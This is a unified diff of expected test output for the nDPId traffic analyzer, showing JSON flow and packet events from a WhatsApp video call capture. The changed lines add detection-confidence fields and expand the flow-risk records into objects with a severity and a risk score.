 00601{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":30,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1561455769790,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"ts_msec":1561455769790,"pkt":"xiwDYGpkkLkxKPrKCABFAACaCwQAAEAROS7AqAIMszzAMNG4DZYAhm7xAAMAaiESpEIMCJFuDJOtHXjqlFNAAABmBQMCyDZF2ddgtlA0UBZWUTgM5bMiF47oTfkR8gxwf\/X6xPiwJonhfyRnCC\/1O3gjqwa36NKC7reorVrW4TGrS5w3rc3nItJV\/XceDJIdYAVMp2RD9UKe1LYtRXT0bfL9vCinKf9\/"}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":31,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455769791,"flow_last_seen":1561455769791,"flow_idle_time":180000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"ts_msec":1561455769791,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"157.240.196.62","src_port":53688,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00601{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":31,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1561455769791,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"ts_msec":1561455769791,"pkt":"xiwDYGpkkLkxKPrKCABFAACaNcQAAEARH6zAqAIMnfDEPtG4DZYAhoAuAAMAaiESpEIMCJFuDJOtHXjqlFRAAABmBQMCyDZF2ddgtlA0UBZWUTgM5bMiF47oTfkR8gxwf\/X6xPiwJonhfyRnCC\/1O3gjqwa36NKC7reorVrW4TGrS5w3rc3nItJV\/XceDJIdYAVMp2RD9UKe1LYtRXT0bfL9vCinKf9\/"}
-00622{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":31,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455769791,"flow_last_seen":1561455769791,"flow_idle_time":180000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"ts_msec":1561455769791,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"157.240.196.62","src_port":53688,"dst_port":3478,"l4_proto":"udp","ndpi": {"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
+00648{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":31,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455769791,"flow_last_seen":1561455769791,"flow_idle_time":180000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"ts_msec":1561455769791,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"157.240.196.62","src_port":53688,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
 00601{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":32,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1561455769791,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"ts_msec":1561455769791,"pkt":"xiwDYGpkkLkxKPrKCABFAACaC9gAAEARSZjAqAIMnfDEPtG4DZYAhoAtAAMAaiESpEIMCJFuDJOtHXjqlFVAAABmBQMCyDZF2ddgtlA0UBZWUTgM5bMiF47oTfkR8gxwf\/X6xPiwJonhfyRnCC\/1O3gjqwa36NKC7reorVrW4TGrS5w3rc3nItJV\/XceDJIdYAVMp2RD9UKe1LYtRXT0bfL9vCinKf9\/"}
 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":37,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1561455769802,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1561455769802,"pkt":"kLkxKPrKxiwDYGpkCABFAABI\/k4AAFQRMGUfDVYwwKgCDA2W0bgANE7GAQMAGCESpEIMCJFuDJOtHXjqlEwAIAAIAAHuJHGmBnJAAgAIAAABa44EONE="}
 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":39,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1561455769812,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1561455769812,"pkt":"kLkxKPrKxiwDYGpkCABFAABI3v0AAFMRY8Sd8MQ+wKgCDA2W0bgANGHGAQMAGCESpEIMCJFuDJOtHXjqlFQAIAAIAAHuJHGmBnJAAgAIAAABa44EONc="}
@@ -33,51 +33,51 @@
 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":43,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1561455769823,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1561455769823,"pkt":"kLkxKPrKxiwDYGpkCABFAABIblcAAFAR2nid8MEwwKgCDA2W0bgANGTSAQMAGCESpEIMCJFuDJOtHXjqlFAAIAAIAAHuJHGmBnJAAgAIAAABa44EON0="}
 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":44,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455770313,"flow_last_seen":1561455770313,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"ts_msec":1561455770313,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"239.255.255.250","src_port":51277,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00618{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":44,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1561455770313,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":179,"pkt_l4_len":145,"ts_msec":1561455770313,"pkt":"AQBef\/\/6kLkxKPrKCABFAAClcA8AAAIRlYrAqAIM7\/\/\/+shNB2wAkeqFTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSE9TVDogMjM5LjI1NS4yNTUuMjUwOjE5MDANClNUOiB1cm46c2NoZW1hcy11cG5wLW9yZzpkZXZpY2U6SW50ZXJuZXRHYXRld2F5RGV2aWNlOjENCk1BTjogInNzZHA6ZGlzY292ZXIiDQpNWDogMw0KDQo="}
-00612{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":44,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455770313,"flow_last_seen":1561455770313,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"ts_msec":1561455770313,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"239.255.255.250","src_port":51277,"dst_port":1900,"l4_proto":"udp","ndpi": {"proto":"SSDP","breed":"Acceptable","category":"System"}}
-00613{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":51,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1561455767339,"flow_last_seen":1561455770332,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":6901,"flow_avg_l4_payload_len":215,"midstream":1,"ts_msec":1561455770332,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"157.240.20.53","src_port":49355,"dst_port":5222,"l4_proto":"tcp","ndpi": {"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}}
-00614{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":51,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1561455767339,"flow_last_seen":1561455770332,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":6901,"flow_avg_l4_payload_len":215,"midstream":1,"ts_msec":1561455770332,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"157.240.20.53","src_port":49355,"dst_port":5222,"l4_proto":"tcp","ndpi": {"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}}
+00638{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":44,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455770313,"flow_last_seen":1561455770313,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"ts_msec":1561455770313,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"239.255.255.250","src_port":51277,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}}
+00647{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":51,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1561455767339,"flow_last_seen":1561455770332,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":6901,"flow_avg_l4_payload_len":215,"midstream":1,"ts_msec":1561455770332,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"157.240.20.53","src_port":49355,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}}
+00648{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":51,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1561455767339,"flow_last_seen":1561455770332,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":6901,"flow_avg_l4_payload_len":215,"midstream":1,"ts_msec":1561455770332,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"157.240.20.53","src_port":49355,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}}
 00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":144,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455772049,"flow_last_seen":1561455772049,"flow_idle_time":180000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"ts_msec":1561455772049,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00845{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":144,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1561455772049,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"ts_msec":1561455772049,"pkt":"\/\/\/\/\/\/\/\/2DBiVgAcCABFAAFInqwAAP8RG\/kAAAAA\/\/\/\/\/wBEAEMBNNtQAQEGAH5K8tcAMwAAAAAAAAAAAAAAAAAAAAAAANgwYlYAHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjglNjNQEBNwoBeQMGD3f8XywuOQIF3D0HAdgwYlYAHDMEAHanAAwKTHVjYXMtaU1hY\/8AAAAAAAAAAAAAAAAA"}
-00701{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":144,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455772049,"flow_last_seen":1561455772049,"flow_idle_time":180000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"ts_msec":1561455772049,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","ndpi": {"proto":"DHCP","breed":"Acceptable","category":"Network"},"dhcp": {"hostname":"lucas-imac","fingerprint":"1,121,3,6,15,119,252,95,44,46","class_ident":""}}
+00727{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":144,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455772049,"flow_last_seen":1561455772049,"flow_idle_time":180000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"ts_msec":1561455772049,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"},"dhcp": {"hostname":"lucas-imac","fingerprint":"1,121,3,6,15,119,252,95,44,46","class_ident":""}}
 00612{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":148,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1561455773318,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":174,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":174,"pkt_l4_len":140,"ts_msec":1561455773318,"pkt":"AQBef\/\/6kLkxKPrKCABFAACgzaAAAAIRN\/7AqAIM7\/\/\/+shNB2wAjBq9TS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSE9TVDogMjM5LjI1NS4yNTUuMjUwOjE5MDANClNUOiB1cm46c2NoZW1hcy11cG5wLW9yZzpzZXJ2aWNlOldBTklQQ29ubmVjdGlvbjoxDQpNQU46ICJzc2RwOmRpc2NvdmVyIg0KTVg6IDMNCg0K"}
 00615{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":152,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1561455776326,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":175,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":175,"pkt_l4_len":141,"ts_msec":1561455776326,"pkt":"AQBef\/\/6kLkxKPrKCABFAAChemIAAAIRizvAqAIM7\/\/\/+shNB2wAjbrDTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSE9TVDogMjM5LjI1NS4yNTUuMjUwOjE5MDANClNUOiB1cm46c2NoZW1hcy11cG5wLW9yZzpzZXJ2aWNlOldBTlBQUENvbm5lY3Rpb246MQ0KTUFOOiAic3NkcDpkaXNjb3ZlciINCk1YOiAzDQoNCg=="}
 00845{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":250,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1561455780246,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"ts_msec":1561455780246,"pkt":"\/\/\/\/\/\/\/\/2DBiVgAcCABFAAFInq0AAP8RG\/gAAAAA\/\/\/\/\/wBEAEMBNNtIAQEGAH5K8tcAOwAAAAAAAAAAAAAAAAAAAAAAANgwYlYAHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjglNjNQEBNwoBeQMGD3f8XywuOQIF3D0HAdgwYlYAHDMEAHanAAwKTHVjYXMtaU1hY\/8AAAAAAAAAAAAAAAAA"}
 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":371,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455781247,"flow_last_seen":1561455781247,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1561455781247,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"1.60.78.64","src_port":53688,"dst_port":59491,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":371,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1561455781247,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1561455781247,"pkt":"xiwDYGpkkLkxKPrKCABFAABIyagAAEARnszAqAIMATxOQNG46GMANIouAAEAGCESpELJdbow6qY0UK1Q3DAACAAUjCUqyJwTIDkKR+sjy0Uf5fkPaoE="}
-00674{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":371,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455781247,"flow_last_seen":1561455781247,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1561455781247,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"1.60.78.64","src_port":53688,"dst_port":59491,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
+00783{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":371,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455781247,"flow_last_seen":1561455781247,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1561455781247,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"1.60.78.64","src_port":53688,"dst_port":59491,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":381,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455781352,"flow_last_seen":1561455781352,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1561455781352,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"91.252.56.51","src_port":53688,"dst_port":32641,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":381,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1561455781352,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1561455781352,"pkt":"xiwDYGpkkLkxKPrKCABFAABIUPMAAEAR0s7AqAIMW\/w4M9G4f4EANAIPAAEAGCESpEIZqLFMH0mnKh34iiEACAAUNcgqBRg9v\/os\/sidMBIfN2R1dO0="}
-00676{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":381,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455781352,"flow_last_seen":1561455781352,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1561455781352,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"91.252.56.51","src_port":53688,"dst_port":32641,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
+00785{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":381,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455781352,"flow_last_seen":1561455781352,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1561455781352,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"91.252.56.51","src_port":53688,"dst_port":32641,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}}
 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":426,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1561455781879,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1561455781879,"pkt":"xiwDYGpkkLkxKPrKCABFAABIUTkAAEARFzzAqAIMATxOQNG46GMANHzbAAEAGCESpELHuuAP05RaI+J6URIACAAUsHZdEyJr5uObsKQa7DYbE4YCA9M="}
 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":434,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1561455782059,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1561455782059,"pkt":"xiwDYGpkkLkxKPrKCABFAABI8PwAAEARMsXAqAIMW\/w4M9G4f4EANE0kAAEAGCESpEKAWzwjt5VRcfVmBmsACAAUJw9zjdQvQsjy5FQih0Itb6wHKg0="}
 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":485,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":1561455782574,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1561455782574,"pkt":"xiwDYGpkkLkxKPrKCABFAABIwHEAAEARqAPAqAIMATxOQNG46GMANGXPAAEAGCESpEIoM9pd\/2PDbhKoL1oACAAUvqQBu1i76V7zg0ib1\/6QLghtUUY="}
 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":497,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":3,"flow_last_seen":1561455782679,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1561455782679,"pkt":"xiwDYGpkkLkxKPrKCABFAABINRkAAEAR7qjAqAIMW\/w4M9G4f4EANKRJAAEAGCESpEL4j9YAEpPJGTu3VCAACAAUGXORRrB48FGvPcJutSVccHGlcxM="}
 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1470,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455791449,"flow_last_seen":1561455791449,"flow_idle_time":180000,"flow_min_l4_payload_len":341,"flow_max_l4_payload_len":341,"flow_tot_l4_payload_len":341,"flow_avg_l4_payload_len":341,"midstream":0,"ts_msec":1561455791449,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00897{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1470,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1561455791449,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":383,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":383,"pkt_l4_len":349,"ts_msec":1561455791449,"pkt":"\/\/\/\/\/\/\/\/xiwDYGpkCABFAAFxMkoAAEARwOHAqAIBwKgC\/0RcRFwBXbU+eyJ2ZXJzaW9uIjogWzIsIDBdLCAicG9ydCI6IDE3NTAwLCAiaG9zdF9pbnQiOiAxNzQ1NjcxOTM5MjIwMTQ2OTg4Njg4NzAzNTEyMjAyNTg3OTI0NDMsICJkaXNwbGF5bmFtZSI6ICIiLCAibmFtZXNwYWNlcyI6IFsyNzUwMzcwNTYwLCA3ODUyNjYxNzcsIDE1MjYyNjMwNDUsIDEzMzg2NTkyMDEsIDE0ODE5MzM3LCA0ODA5NDIwMDQ4LCA1MTE3MDY2NDIsIDczNjM0MTUyOCwgOTM4ODEzODQ5LCAxMjY3Njk1MTA5LCA1NDQwNDA3MDcyLCA0ODEwNTkxNzYwLCA1ODM0NDk5NiwgOTk2MzA2MjE1LCA1MzAzMzAxMjQ4LCAzMDc1NTIxNjk2LCA0MDU2NDYyNTkyLCAyOTYzNjgyMDk2LCAxNTIyMTc3NTg3XX0="}
-00615{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1470,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455791449,"flow_last_seen":1561455791449,"flow_idle_time":180000,"flow_min_l4_payload_len":341,"flow_max_l4_payload_len":341,"flow_tot_l4_payload_len":341,"flow_avg_l4_payload_len":341,"midstream":0,"ts_msec":1561455791449,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","ndpi": {"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}}
